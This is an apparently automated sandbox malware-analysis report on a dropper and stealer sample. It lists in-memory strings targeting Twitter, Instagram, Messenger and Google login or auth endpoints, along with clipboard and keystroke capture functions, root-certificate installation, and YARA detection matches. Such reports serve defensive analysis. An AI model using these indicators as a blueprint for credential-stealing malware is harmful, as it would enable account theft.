Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/ookie:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://twitter.comReferer:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe.4.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.google.com/cloudprint
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.google.com/cloudprint/enab
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN9
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprint7=
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com;
Source: 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messagingP
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.641821279.0000000005C56000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc2
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/clouddevicesH
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.googleapis.com/auth/h
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangoutse2/crx
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 1E1C360C582DF797.exe String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra/crx0
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com;
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accept:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/accept:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/origin:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050F9
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044D1

E-Banking Fraud:

Registers a new ROOT certificate
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext, 4_2_1001F720
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E624C20 _DebugHeapAllocator,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,std::ios_base::good,ExpandEnvironmentStringsW,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,Concurrency::details::ContextBase::GetWorkQueueIdentity,GetCurrentThreadId,GetThreadDesktop,CreateDesktopW,GetLastError,SetThreadDesktop,GetLastError,CloseDesktop,CreateProcessW,GetLastError,CloseDesktop,FindCloseChangeNotification,CreateJobObjectW,AssignProcessToJobObject,_DebugHeapAllocator,Sleep,Sleep,_DebugHeapAllocator,SetThreadDesktop,CloseDesktop,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle, 0_2_6E624C20

System Summary:

Malicious sample detected (through community Yara rule)
Source: 21.2.1E1C360C582DF797.exe.5320000.10.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
Source: 21.2.1E1C360C582DF797.exe.4e60000.9.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
Source: 25.2.1E1C360C582DF797.exe.5230000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text section
Source: aliens.exe.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 1E1C360C582DF797.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Contains functionality to call native functions
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread, 4_2_10019D40
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess, 4_2_10019F00
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess, 4_2_10019F50
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess, 4_2_10019FA0
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01217165: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 1_2_01217165
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_004038AF
Detected potential crypto function
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004079A2 0_2_004079A2
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_004049A8 0_2_004049A8
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406EFE 0_2_00406EFE
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_0040737E 0_2_0040737E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E66CE40 0_2_6E66CE40
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E66AE3E 0_2_6E66AE3E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E679FF6 0_2_6E679FF6
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E67BC5D 0_2_6E67BC5D
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E67FC01 0_2_6E67FC01
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E67BB3D 0_2_6E67BB3D
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E657714 0_2_6E657714
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E6677A0 0_2_6E6677A0
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E66756E 0_2_6E66756E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E66733C 0_2_6E66733C
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01218525 1_2_01218525
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_012265B6 1_2_012265B6
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01230146 1_2_01230146
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121E1E0 1_2_0121E1E0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122702F 1_2_0122702F
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121404E 1_2_0121404E
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121326D 1_2_0121326D
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0123457A 1_2_0123457A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0123055E 1_2_0123055E
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01223731 1_2_01223731
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_012347A9 1_2_012347A9
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121E7E0 1_2_0121E7E0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_012127D4 1_2_012127D4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_012239AC 1_2_012239AC
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01230993 1_2_01230993
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_012269EB 1_2_012269EB
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121F8A8 1_2_0121F8A8
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01225BE7 1_2_01225BE7
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0123CA20 1_2_0123CA20
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121BD53 1_2_0121BD53
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121DDAC 1_2_0121DDAC
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01230DC8 1_2_01230DC8
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122FC4A 1_2_0122FC4A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121EC54 1_2_0121EC54
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01223CDD 1_2_01223CDD
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01215F0C 1_2_01215F0C
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_01240FD4 1_2_01240FD4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0123CECE 1_2_0123CECE
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_00403DA8 4_2_00403DA8
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_00407071 4_2_00407071
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000C063 4_2_1000C063
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000B883 4_2_1000B883
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100060F0 4_2_100060F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100169BD 4_2_100169BD
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100099E0 4_2_100099E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100071F0 4_2_100071F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10009257 4_2_10009257
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10010AED 4_2_10010AED
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10008340 4_2_10008340
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000E380 4_2_1000E380
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000ABA0 4_2_1000ABA0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000B3B0 4_2_1000B3B0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001EBD0 4_2_1001EBD0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_100083F0 4_2_100083F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000BC57 4_2_1000BC57
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000C483 4_2_1000C483
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10010590 4_2_10010590
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001EDDB 4_2_1001EDDB
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1000FF71 4_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026EB7CE 21_2_026EB7CE
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E75D0 21_2_026E75D0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026DEAA1 21_2_026DEAA1
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026F2BB0 21_2_026F2BB0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E6D04 21_2_026E6D04
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E93BFE 21_2_04E93BFE
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E8E58A 21_2_04E8E58A
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04EA0780 21_2_04EA0780
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E8C019 21_2_04E8C019
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04E83C51 21_2_04E83C51
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04EA2F70 21_2_04EA2F70
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\71eza90awf48\aliens.exe 6781F617A3F74D85AC7113828B2BE7D0186E32259FD6B4C10E18C6233CB97549
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll DBE5A7DAF5BCFF97F7C48F9B5476DB3072CC85FBFFD660ADAFF2E0455132D026
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: String function: 04E61320 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: String function: 026E9F94 appears 49 times
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: String function: 6E627EA0 appears 41 times
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: String function: 0122E1C0 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: String function: 0122E0E4 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: String function: 0122EB60 appears 31 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: String function: 10010534 appears 35 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: String function: 004067A9 appears 58 times
PE file contains strange resources
Source: h1GodtbhC8.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: h1GodtbhC8.exe, 00000000.00000003.367160882.0000000000745000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSibClr.dll. vs h1GodtbhC8.exe
Source: h1GodtbhC8.exe, 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSibuia.dllN vs h1GodtbhC8.exe
Tries to load missing DLLs
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Section loaded: dxgidebug.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Yara signature match
Source: 00000015.00000002.831664649.00000000050E9000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000002.654114181.0000000004750000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.641295174.00000000046E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000015.00000002.829571542.00000000046C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.46c0000.7.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.46e0000.5.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.10000000.6.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.4750000.5.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.46e0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.46c0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.10000000.7.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
